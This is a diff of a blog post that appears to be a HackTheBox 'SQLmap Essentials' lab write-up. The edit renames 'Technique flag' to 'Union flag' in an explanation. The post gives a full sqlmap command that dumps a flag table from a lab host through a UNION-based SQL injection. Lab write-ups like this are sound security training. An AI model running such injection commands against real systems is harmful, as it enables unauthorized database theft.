ibrahimnganga/ibrahimnganga.github.io/_posts/2025-01-07-SQLmap-Essentials-HackTheBox.md

 `3.
 What's the contents of table flag7?
 (Case #7)`

 The challenge has a vulnerable parameter at id and it is vulnerable using a UNION Query based technique.
-This means that we have to use the Technique flag.
+This means that we have to use the Union flag.

 `sqlmap -u 'http://83.136.248.62:52853/case7.php?id=1' -T flag7 --dump --batch --risk 3 --level 5 --union-col=5`